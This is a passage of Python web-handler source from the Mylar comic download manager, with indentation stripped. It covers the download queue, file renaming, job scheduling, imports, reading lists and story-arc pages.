myDB = db.DBConnection()
resultlist = 'There are currently no items waiting in the Direct Download (DDL) Queue for processing.'
s_info = myDB.select("SELECT a.ComicName, a.ComicVersion, a.ComicID, a.ComicYear, b.Issue_Number, b.IssueID, c.size, c.status, c.id, c.updated_date, c.issues, c.year FROM comics as a INNER JOIN issues as b ON a.ComicID = b.ComicID INNER JOIN ddl_info as c ON b.IssueID = c.IssueID") # WHERE c.status != 'Downloading'")
o_info = myDB.select("Select a.ComicName, b.Issue_Number, a.IssueID, a.ComicID, c.size, c.status, c.id, c.updated_date, c.issues, c.year from oneoffhistory a join snatched b on a.issueid=b.issueid join ddl_info c on b.issueid=c.issueid where b.provider = 'ddl'")
if s_info:
resultlist = []
for si in s_info:
if si['issues'] is None:
issue = si['Issue_Number']
year = si['ComicYear']
if issue is not None:
issue = '#%s' % issue
else:
year = si['year']
issue = '#%s' % si['issues']
if si['status'] == 'Completed':
si_status = '100%'
else:
si_status = ''
resultlist.append({'series': si['ComicName'],
'issue': issue,
'id': si['id'],
'volume': si['ComicVersion'],
'year': year,
'size': si['size'].strip(),
'comicid': si['ComicID'],
'issueid': si['IssueID'],
'status': si['status'],
'updated_date': si['updated_date'],
'progress': si_status})
if o_info:
if type(resultlist) is str:
resultlist = []
for oi in o_info:
if oi['issues'] is None:
issue = oi['Issue_Number']
year = oi['year']
if issue is not None:
issue = '#%s' % issue
else:
year = oi['year']
issue = '#%s' % oi['issues']
if oi['status'] == 'Completed':
oi_status = '100%'
else:
oi_status = ''
resultlist.append({'series': oi['ComicName'],
'issue': issue,
'id': oi['id'],
'volume': None,
'year': year,
'size': oi['size'].strip(),
'comicid': oi['ComicID'],
'issueid': oi['IssueID'],
'status': oi['status'],
'updated_date': oi['updated_date'],
'progress': oi_status})
return serve_template(templatename="queue_management.html", title="Queue Management", resultlist=resultlist) #activelist=activelist, resultlist=resultlist)
queueManage.exposed = True
def queueManageIt(self, iDisplayStart=0, iDisplayLength=100, iSortCol_0=0, sSortDir_0="desc", sSearch="", **kwargs):
iDisplayStart = int(iDisplayStart)
iDisplayLength = int(iDisplayLength)
filtered = []
myDB = db.DBConnection()
resultlist = 'There are currently no items waiting in the Direct Download (DDL) Queue for processing.'
s_info = myDB.select("SELECT a.ComicName, a.ComicVersion, a.ComicID, a.ComicYear, b.Issue_Number, b.IssueID, c.size, c.status, c.id, c.updated_date, c.issues, c.year FROM comics as a INNER JOIN issues as b ON a.ComicID = b.ComicID INNER JOIN ddl_info as c ON b.IssueID = c.IssueID") # WHERE c.status != 'Downloading'")
o_info = myDB.select("Select a.ComicName, b.Issue_Number, a.IssueID, a.ComicID, c.size, c.status, c.id, c.updated_date, c.issues, c.year from oneoffhistory a join snatched b on a.issueid=b.issueid join ddl_info c on b.issueid=c.issueid where b.provider = 'ddl'")
if s_info:
resultlist = []
for si in s_info:
if si['issues'] is None:
issue = si['Issue_Number']
year = si['ComicYear']
if issue is not None:
issue = '#%s' % issue
else:
year = si['year']
issue = '#%s' % si['issues']
if si['status'] == 'Completed':
si_status = '100%'
else:
si_status = ''
if issue is not None:
if si['ComicVersion'] is not None:
series = '%s %s %s (%s)' % (si['ComicName'], si['ComicVersion'], issue, year)
else:
series = '%s %s (%s)' % (si['ComicName'], issue, year)
else:
if si['ComicVersion'] is not None:
series = '%s %s (%s)' % (si['ComicName'], si['ComicVersion'], year)
else:
series = '%s (%s)' % (si['ComicName'], year)
resultlist.append({'series': series, #i['ComicName'],
'issue': issue,
'queueid': si['id'],
'volume': si['ComicVersion'],
'year': year,
'size': si['size'].strip(),
'comicid': si['ComicID'],
'issueid': si['IssueID'],
'status': si['status'],
'updated_date': si['updated_date'],
'progress': si_status})
if o_info:
if type(resultlist) is str:
resultlist = []
for oi in o_info:
if oi['issues'] is None:
issue = oi['Issue_Number']
year = oi['year']
if issue is not None:
issue = '#%s' % issue
else:
year = oi['year']
issue = '#%s' % oi['issues']
if oi['status'] == 'Completed':
oi_status = '100%'
else:
oi_status = ''
if issue is not None:
series = '%s %s (%s)' % (oi['ComicName'], issue, year)
else:
series = '%s (%s)' % (oi['ComicName'], year)
resultlist.append({'series': series,
'issue': issue,
'queueid': oi['id'],
'volume': None,
'year': year,
'size': oi['size'].strip(),
'comicid': oi['ComicID'],
'issueid': oi['IssueID'],
'status': oi['status'],
'updated_date': oi['updated_date'],
'progress': oi_status})
if sSearch == "" or sSearch == None:
filtered = resultlist[::]
else:
filtered = [row for row in resultlist if any([sSearch.lower() in row['series'].lower(), sSearch.lower() in row['status'].lower()])]
sortcolumn = 'series'
if iSortCol_0 == '1':
sortcolumn = 'series'
elif iSortCol_0 == '2':
sortcolumn = 'size'
elif iSortCol_0 == '3':
sortcolumn = 'progress'
elif iSortCol_0 == '4':
sortcolumn = 'status'
elif iSortCol_0 == '5':
sortcolumn = 'updated_date'
filtered.sort(key=lambda x: x[sortcolumn], reverse=sSortDir_0 == "desc")
rows = filtered[iDisplayStart:(iDisplayStart + iDisplayLength)]
rows = [[row['comicid'], row['series'], row['size'], row['progress'], row['status'], row['updated_date'], row['queueid']] for row in rows]
#rows = [{'comicid': row['comicid'], 'series': row['series'], 'size': row['size'], 'progress': row['progress'], 'status': row['status'], 'updated_date': row['updated_date']} for row in rows]
#logger.info('rows: %s' % rows)
return json.dumps({
'iTotalDisplayRecords': len(filtered),
'iTotalRecords': len(resultlist),
'aaData': rows,
})
queueManageIt.exposed = True
def previewRename(self, **args): #comicid=None, comicidlist=None):
file_format = mylar.CONFIG.FILE_FORMAT
myDB = db.DBConnection()
resultlist = []
for k,v in args.items():
if any([k == 'x', k == 'y']):
continue
elif 'file_format' in k:
file_format = str(v)
elif 'comicid' in k:
if type(v) is list:
comicid = str(' '.join(v))
elif type(v) is unicode:
comicid = re.sub('[\]\[\']', '', v.decode('utf-8').encode('ascii')).strip()
else:
comicid = v
if comicid is not None and type(comicid) is not list:
comicidlist = []
comicidlist.append(comicid)
for cid in comicidlist:
comic = myDB.selectone("SELECT * FROM comics WHERE ComicID=?", [cid]).fetchone()
comicdir = comic['ComicLocation']
comicname = comic['ComicName']
issuelist = myDB.select("SELECT * FROM issues WHERE ComicID=? AND Location is not NULL ORDER BY ReleaseDate", [str(cid)])
if issuelist:
for issue in issuelist:
if 'annual' in issue['Location'].lower():
annualize = 'yes'
else:
annualize = None
import filers
rniss = filers.FileHandlers(ComicID=str(cid), IssueID=issue['IssueID'])
renameiss = rniss.rename_file(issue['Location'], annualize=annualize, file_format=file_format)
#renameiss = helpers.rename_param(comicid, comicname, issue['Issue_Number'], issue['Location'], comicyear=None, issueid=issue['IssueID'], annualize=annualize)
resultlist.append({'issueid': renameiss['issueid'],
'comicid': renameiss['comicid'],
'original': issue['Location'],
'new': renameiss['nfilename']})
logger.info('resultlist: %s' % resultlist)
return serve_template(templatename="previewrename.html", title="Preview Renamer", resultlist=resultlist, file_format=file_format, comicid=comicidlist)
previewRename.exposed = True
def manualRename(self, comicid):
if mylar.CONFIG.FILE_FORMAT == '':
logger.error("You haven't specified a File Format in Configuration/Advanced")
logger.error("Cannot rename files.")
return
if type(comicid) is not unicode:
comiclist = comicid
else:
comiclist = []
comiclist.append(comicid)
myDB = db.DBConnection()
for cid in comiclist:
filefind = 0
comic = myDB.selectone("SELECT * FROM comics WHERE ComicID=?", [cid]).fetchone()
comicdir = comic['ComicLocation']
comicname = comic['ComicName']
comicyear = comic['ComicYear']
extensions = ('.cbr', '.cbz', '.cb7')
issues = myDB.select("SELECT * FROM issues WHERE ComicID=?", [cid])
if mylar.CONFIG.ANNUALS_ON:
issues += myDB.select("SELECT * FROM annuals WHERE ComicID=?", [cid])
try:
if mylar.CONFIG.MULTIPLE_DEST_DIRS is not None and mylar.CONFIG.MULTIPLE_DEST_DIRS != 'None' and os.path.join(mylar.CONFIG.MULTIPLE_DEST_DIRS, os.path.basename(comicdir)) != comicdir:
logger.fdebug('multiple_dest_dirs:' + mylar.CONFIG.MULTIPLE_DEST_DIRS)
logger.fdebug('dir: ' + comicdir)
logger.fdebug('os.path.basename: ' + os.path.basename(comicdir))
pathdir = os.path.join(mylar.CONFIG.MULTIPLE_DEST_DIRS, os.path.basename(comicdir))
except:
pass
for root, dirnames, filenames in os.walk(comicdir):
for filename in filenames:
if filename.lower().endswith(extensions):
#logger.info("filename being checked is : " + str(filename))
for issue in issues:
if issue['Location'] == filename:
#logger.error("matched " + str(filename) + " to DB file " + str(issue['Location']))
if 'annual' in issue['Location'].lower():
annualize = 'yes'
else:
annualize = None
renameiss = helpers.rename_param(cid, comicname, issue['Issue_Number'], filename, comicyear=comicyear, issueid=issue['IssueID'], annualize=annualize)
nfilename = renameiss['nfilename']
srciss = os.path.join(comicdir, filename)
if filename != nfilename:
logger.info('Renaming ' + filename + ' ... to ... ' + renameiss['nfilename'])
try:
shutil.move(srciss, renameiss['destination_dir'])
except (OSError, IOError):
logger.error('Failed to move files - check directories and manually re-run.')
return
filefind+=1
else:
logger.info('Not renaming ' + filename + ' as it is in desired format already.')
#continue
logger.info('I have renamed ' + str(filefind) + ' issues of ' + comicname)
updater.forceRescan(cid)
if len(comiclist) > 1:
logger.info('[RENAMER] %s series have been renamed.' % len(comiclist))
manualRename.exposed = True
def searchScan(self, name):
return serve_template(templatename="searchfix.html", title="Manage", name=name)
searchScan.exposed = True
def manage(self):
mylarRoot = mylar.CONFIG.DESTINATION_DIR
import db
myDB = db.DBConnection()
jobresults = myDB.select('SELECT DISTINCT * FROM jobhistory')
if jobresults is not None:
tmp = []
for jb in jobresults:
if jb['prev_run_datetime'] is not None:
try:
pr = (datetime.datetime.strptime(jb['prev_run_datetime'][:19], '%Y-%m-%d %H:%M:%S') - datetime.datetime.utcfromtimestamp(0)).total_seconds()
except ValueError:
pr = (datetime.datetime.strptime(jb['prev_run_datetime'], '%Y-%m-%d %H:%M:%S.%f') - datetime.datetime.utcfromtimestamp(0)).total_seconds()
prev_run = datetime.datetime.fromtimestamp(pr)
else:
prev_run = None
if jb['next_run_datetime'] is not None:
try:
nr = (datetime.datetime.strptime(jb['next_run_datetime'][:19], '%Y-%m-%d %H:%M:%S') - datetime.datetime.utcfromtimestamp(0)).total_seconds()
except ValueError:
nr = (datetime.datetime.strptime(jb['next_run_datetime'], '%Y-%m-%d %H:%M:%S.%f') - datetime.datetime.utcfromtimestamp(0)).total_seconds()
next_run = datetime.datetime.fromtimestamp(nr)
else:
next_run = None
if 'rss' in jb['JobName'].lower():
if jb['Status'] == 'Waiting' and mylar.CONFIG.ENABLE_RSS is False:
mylar.RSS_STATUS = 'Paused'
elif jb['Status'] == 'Paused' and mylar.CONFIG.ENABLE_RSS is True:
mylar.RSS_STATUS = 'Waiting'
status = mylar.RSS_STATUS
interval = str(mylar.CONFIG.RSS_CHECKINTERVAL) + ' mins'
if 'weekly' in jb['JobName'].lower():
status = mylar.WEEKLY_STATUS
if mylar.CONFIG.ALT_PULL == 2: interval = '4 hrs'
else: interval = '24 hrs'
if 'search' in jb['JobName'].lower():
status = mylar.SEARCH_STATUS
interval = str(mylar.CONFIG.SEARCH_INTERVAL) + ' mins'
if 'updater' in jb['JobName'].lower():
status = mylar.UPDATER_STATUS
interval = str(int(mylar.DBUPDATE_INTERVAL)) + ' mins'
if 'folder' in jb['JobName'].lower():
status = mylar.MONITOR_STATUS
interval = str(mylar.CONFIG.DOWNLOAD_SCAN_INTERVAL) + ' mins'
if 'version' in jb['JobName'].lower():
status = mylar.VERSION_STATUS
interval = str(mylar.CONFIG.CHECK_GITHUB_INTERVAL) + ' mins'
if status != jb['Status'] and not('rss' in jb['JobName'].lower()):
status = jb['Status']
tmp.append({'prev_run_datetime': prev_run,
'next_run_datetime': next_run,
'interval': interval,
'jobname': jb['JobName'],
'status': status})
jobresults = tmp
return serve_template(templatename="manage.html", title="Manage", mylarRoot=mylarRoot, jobs=jobresults)
manage.exposed = True
def jobmanage(self, job, mode):
logger.info('%s : %s' % (job, mode))
jobid = None
job_id_map = {'DB Updater': 'dbupdater', 'Auto-Search': 'search', 'RSS Feeds': 'rss', 'Weekly Pullist': 'weekly', 'Check Version': 'version', 'Folder Monitor': 'monitor'}
for k,v in job_id_map.iteritems():
if k == job:
jobid = v
break
logger.info('jobid: %s' % jobid)
if jobid is not None:
myDB = db.DBConnection()
if mode == 'pause':
try:
mylar.SCHED.pause_job(jobid)
except:
pass
logger.info('[%s] Paused scheduled runtime.' % job)
ctrl = {'JobName': job}
val = {'Status': 'Paused'}
if jobid == 'rss':
mylar.CONFIG.ENABLE_RSS = False
elif jobid == 'monitor':
mylar.CONFIG.ENABLE_CHECK_FOLDER = False
myDB.upsert('jobhistory', val, ctrl)
elif mode == 'resume':
try:
mylar.SCHED.resume_job(jobid)
except:
pass
logger.info('[%s] Resumed scheduled runtime.' % job)
ctrl = {'JobName': job}
val = {'Status': 'Waiting'}
myDB.upsert('jobhistory', val, ctrl)
if jobid == 'rss':
mylar.CONFIG.ENABLE_RSS = True
elif jobid == 'monitor':
mylar.CONFIG.ENABLE_CHECK_FOLDER = True
helpers.job_management()
else:
logger.warn('%s cannot be matched against any scheduled jobs - maybe you should restart?' % job)
jobmanage.exposed = True
def schedulerForceCheck(self, jobid):
from apscheduler.triggers.date import DateTrigger
for jb in mylar.SCHED.get_jobs():
if jobid.lower() in str(jb).lower():
logger.info('[%s] Now force submitting job for jobid %s' % (jb, jobid))
if any([jobid == 'rss', jobid == 'weekly', jobid =='search', jobid == 'version', jobid == 'updater', jobid == 'monitor']):
jb.modify(next_run_time=datetime.datetime.utcnow())
break
schedulerForceCheck.exposed = True
def manageComics(self):
comics = helpers.havetotals()
return serve_template(templatename="managecomics.html", title="Manage Comics", comics=comics)
manageComics.exposed = True
def manageIssues(self, **kwargs):
status = kwargs['status']
results = []
resultlist = []
myDB = db.DBConnection()
if mylar.CONFIG.ANNUALS_ON:
issues = myDB.select("SELECT * from issues WHERE Status=? AND ComicName NOT LIKE '%Annual%'", [status])
annuals = myDB.select("SELECT * from annuals WHERE Status=?", [status])
else:
issues = myDB.select("SELECT * from issues WHERE Status=?", [status])
annuals = []
for iss in issues:
results.append(iss)
if status == 'Snatched':
resultlist.append(str(iss['IssueID']))
for ann in annuals:
results.append(ann)
if status == 'Snatched':
resultlist.append(str(ann['IssueID']))
endresults = []
if status == 'Snatched':
for genlist in helpers.chunker(resultlist, 200):
tmpsql = "SELECT * FROM snatched where Status='Snatched' and status != 'Post-Processed' and (provider='32P' or Provider='WWT' or Provider='DEM') AND IssueID in ({seq})".format(seq=','.join(['?'] *(len(genlist))))
chkthis = myDB.select(tmpsql, genlist)
if chkthis is None:
continue
else:
for r in results:
rr = dict(r)
snatchit = [x['hash'] for x in chkthis if r['ISSUEID'] == x['IssueID']]
try:
if snatchit:
logger.fdebug('[%s] Discovered previously snatched torrent not downloaded. Marking for manual auto-snatch retrieval: %s' % (r['ComicName'], ''.join(snatchit)))
rr['hash'] = ''.join(snatchit)
else:
rr['hash'] = None
except:
rr['hash'] = None
endresults.append(rr)
results = endresults
return serve_template(templatename="manageissues.html", title="Manage " + str(status) + " Issues", issues=results, status=status)
manageIssues.exposed = True
def manageFailed(self):
results = []
myDB = db.DBConnection()
failedlist = myDB.select('SELECT * from Failed')
for f in failedlist:
if f['Provider'] == 'Public Torrents':
link = helpers.torrent_create(f['Provider'], f['ID'])
else:
link = f['ID']
if f['DateFailed'] is None:
datefailed = '0000-00-0000'
else:
datefailed = f['DateFailed']
results.append({"Series": f['ComicName'],
"ComicID": f['ComicID'],
"Issue_Number": f['Issue_Number'],
"Provider": f['Provider'],
"Link": link,
"ID": f['ID'],
"FileName": f['NZBName'],
"DateFailed": datefailed})
return serve_template(templatename="managefailed.html", title="Failed DB Management", failed=results)
manageFailed.exposed = True
def flushImports(self):
myDB = db.DBConnection()
myDB.action('DELETE from importresults')
logger.info("Flushing all Import Results and clearing the tables")
flushImports.exposed = True
def markImports(self, action=None, **args):
import unicodedata
myDB = db.DBConnection()
comicstoimport = []
if action == 'massimport':
logger.info('Initiating mass import.')
cnames = myDB.select("SELECT ComicName, ComicID, Volume, DynamicName from importresults WHERE Status='Not Imported' GROUP BY DynamicName, Volume")
for cname in cnames:
if cname['ComicID']:
comicid = cname['ComicID']
else:
comicid = None
try:
comicstoimport.append({'ComicName': unicodedata.normalize('NFKD', cname['ComicName']).encode('utf-8', 'ignore').decode('utf-8', 'ignore'),
'DynamicName': cname['DynamicName'],
'Volume': cname['Volume'],
'ComicID': comicid})
except Exception as e:
logger.warn('[ERROR] There was a problem attempting to queue %s %s [%s] to import (ignoring): %s' % (cname['ComicName'],cname['Volume'],comicid, e))
logger.info(str(len(comicstoimport)) + ' series will be attempted to be imported.')
else:
if action == 'importselected':
logger.info('importing selected series.')
for k,v in args.items():
#k = Comicname[Volume]|ComicID
#v = DynamicName
Volst = k.find('[')
comicid_st = k.find('|')
if comicid_st == -1:
comicid = None
volume = re.sub('[\[\]]', '', k[Volst:]).strip()
else:
comicid = k[comicid_st+1:]
if comicid == 'None':
comicid = None
volume = re.sub('[\[\]]', '', k[Volst:comicid_st]).strip()
ComicName = k[:Volst].strip()
DynamicName = v
cid = ComicName.decode('utf-8', 'replace')
comicstoimport.append({'ComicName': cid,
'DynamicName': DynamicName,
'Volume': volume,
'ComicID': comicid})
elif action == 'removeimport':
for k,v in args.items():
Volst = k.find('[')
comicid_st = k.find('|')
if comicid_st == -1:
comicid = None
volume = re.sub('[\[\]]', '', k[Volst:]).strip()
else:
comicid = k[comicid_st+1:]
if comicid == 'None':
comicid = None
volume = re.sub('[\[\]]', '', k[Volst:comicid_st]).strip()
ComicName = k[:Volst].strip()
DynamicName = v
if volume is None or volume == 'None':
logger.info('Removing ' + ComicName + ' from the Import list')
myDB.action('DELETE from importresults WHERE DynamicName=? AND (Volume is NULL OR Volume="None")', [DynamicName])
else:
logger.info('Removing ' + ComicName + ' [' + str(volume) + '] from the Import list')
myDB.action('DELETE from importresults WHERE DynamicName=? AND Volume=?', [DynamicName, volume])
if len(comicstoimport) > 0:
logger.info('Initiating selected import mode for ' + str(len(comicstoimport)) + ' series.')
if len(comicstoimport) > 0:
logger.debug('The following series will now be attempted to be imported: %s' % comicstoimport)
threading.Thread(target=self.preSearchit, args=[None, comicstoimport, len(comicstoimport)]).start()
raise cherrypy.HTTPRedirect("importResults")
markImports.exposed = True
def markComics(self, action=None, **args):
myDB = db.DBConnection()
comicsToAdd = []
clist = []
for k,v in args.items():
if k == 'manage_comic_length':
continue
#k = Comicname[ComicYear]
#v = ComicID
comyr = k.find('[')
ComicYear = re.sub('[\[\]]', '', k[comyr:]).strip()
ComicName = k[:comyr].strip()
if isinstance(v, list):
#because multiple items can have the same comicname & year, we need to make sure they're all unique entries
for x in v:
clist.append({'ComicName': ComicName,
'ComicYear': ComicYear,
'ComicID': x})
else:
clist.append({'ComicName': ComicName,
'ComicYear': ComicYear,
'ComicID': v})
for cl in clist:
if action == 'delete':
logger.info('[MANAGE COMICS][DELETION] Now deleting ' + cl['ComicName'] + ' (' + str(cl['ComicYear']) + ') [' + str(cl['ComicID']) + '] form the DB.')
myDB.action('DELETE from comics WHERE ComicID=?', [cl['ComicID']])
myDB.action('DELETE from issues WHERE ComicID=?', [cl['ComicID']])
if mylar.CONFIG.ANNUALS_ON:
myDB.action('DELETE from annuals WHERE ComicID=?', [cl['ComicID']])
logger.info('[MANAGE COMICS][DELETION] Successfully deleted ' + cl['ComicName'] + '(' + str(cl['ComicYear']) + ')')
elif action == 'pause':
controlValueDict = {'ComicID': cl['ComicID']}
newValueDict = {'Status': 'Paused'}
myDB.upsert("comics", newValueDict, controlValueDict)
logger.info('[MANAGE COMICS][PAUSE] ' + cl['ComicName'] + ' has now been put into a Paused State.')
elif action == 'resume':
controlValueDict = {'ComicID': cl['ComicID']}
newValueDict = {'Status': 'Active'}
myDB.upsert("comics", newValueDict, controlValueDict)
logger.info('[MANAGE COMICS][RESUME] ' + cl['ComicName'] + ' has now been put into a Resumed State.')
elif action == 'recheck' or action == 'metatag':
comicsToAdd.append({'ComicID': cl['ComicID'],
'ComicName': cl['ComicName'],
'ComicYear': cl['ComicYear']})
else:
comicsToAdd.append(cl['ComicID'])
if len(comicsToAdd) > 0:
if action == 'recheck':
logger.info('[MANAGE COMICS][RECHECK-FILES] Rechecking Files for ' + str(len(comicsToAdd)) + ' series')
threading.Thread(target=self.forceRescan, args=[comicsToAdd,True,'recheck']).start()
elif action == 'metatag':
logger.info('[MANAGE COMICS][MASS METATAGGING] Now Metatagging Files for ' + str(len(comicsToAdd)) + ' series')
threading.Thread(target=self.forceRescan, args=[comicsToAdd,True,'metatag']).start()
elif action == 'rename':
logger.info('[MANAGE COMICS][MASS RENAMING] Now Renaming Files for ' + str(len(comicsToAdd)) + ' series')
threading.Thread(target=self.manualRename, args=[comicsToAdd]).start()
else:
logger.info('[MANAGE COMICS][REFRESH] Refreshing ' + str(len(comicsToAdd)) + ' series')
threading.Thread(target=updater.dbUpdate, args=[comicsToAdd]).start()
markComics.exposed = True
def forceUpdate(self):
from mylar import updater
threading.Thread(target=updater.dbUpdate).start()
raise cherrypy.HTTPRedirect("home")
forceUpdate.exposed = True
def forceSearch(self):
#from mylar import search
#threading.Thread(target=search.searchforissue).start()
#raise cherrypy.HTTPRedirect("home")
self.schedulerForceCheck(jobid='search')
forceSearch.exposed = True
def forceRescan(self, ComicID, bulk=False, action='recheck'):
if bulk:
cnt = 1
if action == 'recheck':
for cid in ComicID:
logger.info('[MASS BATCH][RECHECK-FILES][' + str(cnt) + '/' + str(len(ComicID)) + '] Rechecking ' + cid['ComicName'] + '(' + str(cid['ComicYear']) + ')')
updater.forceRescan(cid['ComicID'])
cnt+=1
logger.info('[MASS BATCH][RECHECK-FILES] I have completed rechecking files for ' + str(len(ComicID)) + ' series.')
else:
for cid in ComicID:
logger.info('[MASS BATCH][METATAGGING-FILES][' + str(cnt) + '/' + str(len(ComicID)) + '] Now Preparing to metatag series for ' + cid['ComicName'] + '(' + str(cid['ComicYear']) + ')')
self.group_metatag(ComicID=cid['ComicID'])
cnt+=1
logger.info('[MASS BATCH][METATAGGING-FILES] I have completed metatagging files for ' + str(len(ComicID)) + ' series.')
else:
threading.Thread(target=updater.forceRescan, args=[ComicID]).start()
forceRescan.exposed = True
def checkGithub(self):
from mylar import versioncheck
versioncheck.checkGithub()
raise cherrypy.HTTPRedirect("home")
checkGithub.exposed = True
def history(self):
myDB = db.DBConnection()
history = myDB.select('''SELECT * from snatched order by DateAdded DESC''')
return serve_template(templatename="history.html", title="History", history=history)
history.exposed = True
def reOrder(request):
return request
# return serve_template(templatename="reorder.html", title="ReoRdered!", reorder=request)
reOrder.exposed = True
def readlist(self):
myDB = db.DBConnection()
issuelist = myDB.select("SELECT * from readlist")
#tuple this
readlist = []
counts = []
c_added = 0 #count of issues that have been added to the readlist and remain in that status ( meaning not sent / read )
c_sent = 0 #count of issues that have been sent to a third-party device ( auto-marked after a successful send completion )
c_read = 0 #count of issues that have been marked as read ( manually marked as read - future: read state from xml )
for iss in issuelist:
if iss['Status'] == 'Added':
statuschange = iss['DateAdded']
c_added +=1
else:
if iss['Status'] == 'Read':
c_read +=1
elif iss['Status'] == 'Downloaded':
c_sent +=1
statuschange = iss['StatusChange']
readlist.append({"ComicID": iss['ComicID'],
"ComicName": iss['ComicName'],
"SeriesYear": iss['SeriesYear'],
"Issue_Number": iss['Issue_Number'],
"IssueDate": iss['IssueDate'],
"Status": iss['Status'],
"StatusChange": statuschange,
"inCacheDIR": iss['inCacheDIR'],
"Location": iss['Location'],
"IssueID": iss['IssueID']})
counts = {"added": c_added,
"read": c_read,
"sent": c_sent,
"total": (c_added + c_read + c_sent)}
return serve_template(templatename="readinglist.html", title="Reading Lists", issuelist=readlist, counts=counts)
readlist.exposed = True
def clear_arcstatus(self, issuearcid=None):
myDB = db.DBConnection()
myDB.upsert('storyarcs', {'Status': 'Skipped'}, {'IssueArcID': issuearcid})
logger.info('Status set to Skipped.')
clear_arcstatus.exposed = True
def storyarc_main(self, arcid=None):
myDB = db.DBConnection()
arclist = []
if arcid is None:
alist = myDB.select("SELECT * from storyarcs WHERE ComicName is not Null GROUP BY StoryArcID") #COLLATE NOCASE")
else:
alist = myDB.select("SELECT * from storyarcs WHERE ComicName is not Null AND StoryArcID=? GROUP BY StoryArcID", [arcid]) #COLLATE NOCASE")
for al in alist:
totalissues = myDB.select("SELECT COUNT(*) as count from storyarcs WHERE StoryARcID=? AND NOT Manual is 'deleted'", [al['StoryArcID']])
havecnt = myDB.select("SELECT COUNT(*) as count FROM storyarcs WHERE StoryArcID=? AND (Status='Downloaded' or Status='Archived')", [al['StoryArcID']])
havearc = havecnt[0][0]
totalarc = totalissues[0][0]
if not havearc:
havearc = 0
try:
percent = (havearc *100.0) /totalarc
if percent > 100:
percent = 101
except (ZeroDivisionError, TypeError):
percent = 0
totalarc = '?'
arclist.append({"StoryArcID": al['StoryArcID'],
"StoryArc": al['StoryArc'],
"TotalIssues": al['TotalIssues'],
"SeriesYear": al['SeriesYear'],
"StoryArcDir": al['StoryArc'],
"Status": al['Status'],
"percent": percent,
"Have": havearc,
"SpanYears": helpers.spantheyears(al['StoryArcID']),
"Total": totalarc,
"CV_ArcID": al['CV_ArcID']})
if arcid is None:
return serve_template(templatename="storyarc.html", title="Story Arcs", arclist=arclist, delete_type=0)
else:
return arclist[0]
storyarc_main.exposed = True
def detailStoryArc(self, StoryArcID, StoryArcName=None):
myDB = db.DBConnection()
arcinfo = myDB.select("SELECT * from storyarcs WHERE StoryArcID=? and NOT Manual IS 'deleted' order by ReadingOrder ASC", [StoryArcID])
try:
cvarcid = arcinfo[0]['CV_ArcID']
arcpub = arcinfo[0]['Publisher']
if StoryArcName is None:
StoryArcName = arcinfo[0]['StoryArc']
lowyear = 9999
maxyear = 0
issref = []
for la in arcinfo:
if all([la['Status'] == 'Downloaded', la['Location'] is None,]):
issref.append({'IssueID': la['IssueID'],
'ComicID': la['ComicID'],
'IssuePublisher': la['IssuePublisher'],
'Publisher': la['Publisher'],
'StoryArc': la['StoryArc'],
'StoryArcID': la['StoryArcID'],
'ComicName': la['ComicName'],
'IssueNumber': la['IssueNumber'],
'ReadingOrder': la['ReadingOrder']})
if la['IssueDate'] is None or la['IssueDate'] == '0000-00-00':
continue
else:
if int(la['IssueDate'][:4]) > maxyear:
maxyear = int(la['IssueDate'][:4])
if int(la['IssueDate'][:4]) < lowyear:
lowyear = int(la['IssueDate'][:4])
if maxyear == 0:
spanyears = la['SeriesYear']
elif lowyear == maxyear:
spanyears = str(maxyear)
else:
spanyears = '%s - %s' % (lowyear, maxyear)
sdir = helpers.arcformat(arcinfo[0]['StoryArc'], spanyears, arcpub)
except:
cvarcid = None
sdir = mylar.CONFIG.GRABBAG_DIR
if len(issref) > 0:
helpers.updatearc_locs(StoryArcID, issref)
arcinfo = myDB.select("SELECT * from storyarcs WHERE StoryArcID=? AND NOT Manual IS 'deleted' order by ReadingOrder ASC", [StoryArcID])
arcdetail = self.storyarc_main(arcid=arcinfo[0]['CV_ArcID'])
storyarcbanner = None
#bannerheight = 400
#bannerwidth = 263
filepath = None
sb = 'cache/storyarcs/' + str(arcinfo[0]['CV_ArcID']) + '-banner'
storyarc_imagepath = os.path.join(mylar.CONFIG.CACHE_DIR, 'storyarcs')
if not os.path.exists(storyarc_imagepath):
try:
os.mkdir(storyarc_imagepath)
except:
logger.warn('Unable to create storyarc image directory @ %s' % storyarc_imagepath)
if os.path.exists(storyarc_imagepath):
dir = os.listdir(storyarc_imagepath)
for fname in dir:
if str(arcinfo[0]['CV_ArcID']) in fname:
storyarcbanner = sb
filepath = os.path.join(storyarc_imagepath, fname)
# if any(['H' in fname, 'W' in fname]):
# if 'H' in fname:
# bannerheight = int(fname[fname.find('H')+1:fname.find('.')])
# elif 'W' in fname:
# bannerwidth = int(fname[fname.find('W')+1:fname.find('.')])
# if any([bannerwidth != 263, 'W' in fname]):
# #accomodate poster size
# storyarcbanner += 'W' + str(bannerheight)
# else:
# #for actual banner width (ie. 960x280)
# storyarcbanner += 'H' + str(bannerheight)
storyarcbanner += os.path.splitext(fname)[1] + '?' + datetime.datetime.now().strftime('%y-%m-%d %H:%M:%S')
break
template = 'storyarc_detail.html'
if filepath is not None:
import get_image_size
image = get_image_size.get_image_metadata(filepath)
imageinfo = json.loads(get_image_size.Image.to_str_json(image))
#logger.fdebug('imageinfo: %s' % imageinfo)
if imageinfo['width'] > imageinfo['height']:
template = 'storyarc_detail.html'
bannerheight = '280'
bannerwidth = '960'
else:
template = 'storyarc_detail.poster.html'
bannerwidth = '263'
bannerheight = '400'
else:
bannerheight = '280'
bannerwidth = '960'
return serve_template(templatename=template, title="Detailed Arc list", readlist=arcinfo, storyarcname=StoryArcName, storyarcid=StoryArcID, cvarcid=cvarcid, sdir=sdir, arcdetail=arcdetail, storyarcbanner=storyarcbanner, bannerheight=bannerheight, bannerwidth=bannerwidth, spanyears=spanyears)
detailStoryArc.exposed = True
def order_edit(self, id, value):
storyarcid = id[:id.find('.')]
issuearcid = id[id.find('.') +1:]
readingorder = value
#readingorder = value
valid_readingorder = None
#validate input here for reading order.
try:
if int(readingorder) >= 0:
valid_readingorder = int(readingorder)
if valid_readingorder == 0:
valid_readingorder = 1
except ValueError:
logger.error('Non-Numeric/Negative readingorder submitted. Rejecting due to sequencing error.')
return
if valid_readingorder is None:
logger.error('invalid readingorder supplied. Rejecting due to sequencing error')
return
myDB = db.DBConnection()
readchk = myDB.select("SELECT * FROM storyarcs WHERE StoryArcID=? AND NOT Manual is 'deleted' ORDER BY ReadingOrder", [storyarcid])
if readchk is None:
logger.error('Cannot edit this for some reason (Cannot locate Storyarc) - something is wrong.')
return
new_readorder = []
